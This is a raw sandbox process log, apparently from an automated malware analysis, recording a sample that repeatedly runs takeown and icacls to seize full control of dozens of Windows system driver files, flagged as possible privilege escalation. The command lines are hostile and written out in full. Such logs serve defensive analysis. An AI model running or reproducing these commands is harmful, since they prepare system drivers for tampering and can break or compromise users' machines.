C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:3336
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4140
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"3⤵PID:4176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:3548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:4248
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:4120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵PID:4240
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"3⤵PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:4184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵PID:4352
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"3⤵PID:4420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:4232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:4320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"3⤵PID:4360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:4304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:4368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"3⤵PID:4412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:4376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:4476
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"3⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:4428
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:4488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"3⤵PID:4560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:4468
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵
- Modifies file permissions
PID:4640
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"3⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:4504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"3⤵PID:4740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:4528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:4580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:4656
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"3⤵PID:4760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:4620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵PID:4800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"3⤵PID:4880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:4676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:4832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"3⤵PID:4888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:4692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵
- Possible privilege escalation attempt
PID:4820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:4792
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciide.sys3⤵PID:4896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"3⤵PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:4844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciidex.sys3⤵PID:4952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:4924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcmcia.sys3⤵PID:5108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:4960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcw.sys3⤵PID:5060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit2⤵PID:4992
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\PEAuth.sys3⤵PID:3692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit2⤵PID:5040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\portcls.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1324
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit2⤵PID:5076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\processr.sys3⤵
- Possible privilege escalation attempt
PID:3504
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"3⤵PID:4200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit2⤵PID:5116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql2300.sys3⤵PID:3600
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"3⤵PID:4244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit2⤵PID:4116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql40xx.sys3⤵PID:1060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit2⤵PID:4228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\qwavedrv.sys3⤵PID:2132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"3⤵PID:4168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit2⤵PID:4240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasacd.sys3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"3⤵PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit2⤵PID:4220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasl2tp.sys3⤵PID:4424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rasl2tp.sys /grant "Admin:F"3⤵PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit2⤵PID:4236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspppoe.sys3⤵
- Modifies file permissions
PID:4452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit2⤵PID:4312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspptp.sys3⤵PID:4636
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\raspptp.sys /grant "Admin:F"3⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit2⤵PID:4308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rassstp.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rassstp.sys /grant "Admin:F"3⤵PID:4552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit2⤵PID:4492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdbss.sys3⤵PID:4768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit2⤵PID:4564
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpbus.sys3⤵PID:4584
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"3⤵PID:4860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit2⤵PID:4712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPCDD.sys3⤵PID:4592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"3⤵PID:4624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit2⤵PID:4732
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpdr.sys3⤵PID:4684
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit2⤵PID:4744
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPENCDD.sys3⤵
- Modifies file permissions
PID:4796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"3⤵PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit2⤵PID:4824
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPREFMP.sys3⤵PID:4852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit2⤵PID:4696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpvideominiport.sys3⤵PID:5008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"3⤵PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit2⤵PID:4736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpwd.sys3⤵PID:5112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit2⤵PID:5020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdyboost.sys3⤵
- Possible privilege escalation attempt
PID:4064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdyboost.sys /grant "Admin:F"3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit2⤵PID:3620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rmcast.sys3⤵PID:4164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"3⤵PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit2⤵PID:4112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RNDISMP.sys3⤵PID:4988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RNDISMP.sys /grant "Admin:F"3⤵PID:4244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit2⤵PID:5036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rootmdm.sys3⤵PID:3136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit2⤵PID:4176
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rspndr.sys3⤵PID:4076
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rspndr.sys /grant "Admin:F"3⤵PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit2⤵PID:4264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Rtnic64.sys3⤵PID:4216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys && icacls C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys /grant "%username%:F" && exit2⤵PID:4332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys3⤵PID:4632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sbm1mhnwjdiiaa.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit2⤵PID:4168
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbp2port.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sbp2port.sys /grant "Admin:F"3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit2⤵PID:4300
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scfilter.sys3⤵PID:4352
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\scfilter.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit2⤵PID:4452
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scsiport.sys3⤵PID:4500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\scsiport.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit2⤵PID:4368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\secdrv.sys3⤵PID:4860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\secdrv.sys /grant "Admin:F"3⤵PID:4624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit2⤵PID:4760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serenum.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serenum.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit2⤵PID:4768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serial.sys3⤵PID:4864
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit2⤵PID:4872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sermouse.sys3⤵PID:4108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sermouse.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit2⤵PID:4800
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffdisk.sys3⤵
- Possible privilege escalation attempt
PID:4796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffdisk.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit2⤵PID:4984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_mmc.sys3⤵PID:4132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "Admin:F"3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit2⤵PID:4808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_sd.sys3⤵PID:5032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sffp_sd.sys /grant "Admin:F"3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit2⤵PID:4700
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sfloppy.sys3⤵PID:4920
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"3⤵PID:4296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit2⤵PID:4144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid2.sys3⤵
- Modifies file permissions
PID:4156
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit2⤵PID:3364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid4.sys3⤵PID:4928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid4.sys /grant "Admin:F"3⤵PID:4552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit2⤵PID:3684
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smb.sys3⤵
- Modifies file permissions
PID:4640
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"3⤵PID:4500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit2⤵PID:3136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smclib.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smclib.sys /grant "Admin:F"3⤵PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit2⤵PID:4964
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spldr.sys3⤵
- Possible privilege escalation attempt
PID:4456
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\spldr.sys /grant "Admin:F"3⤵PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit2⤵PID:4076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spsys.sys3⤵PID:4388
-
-
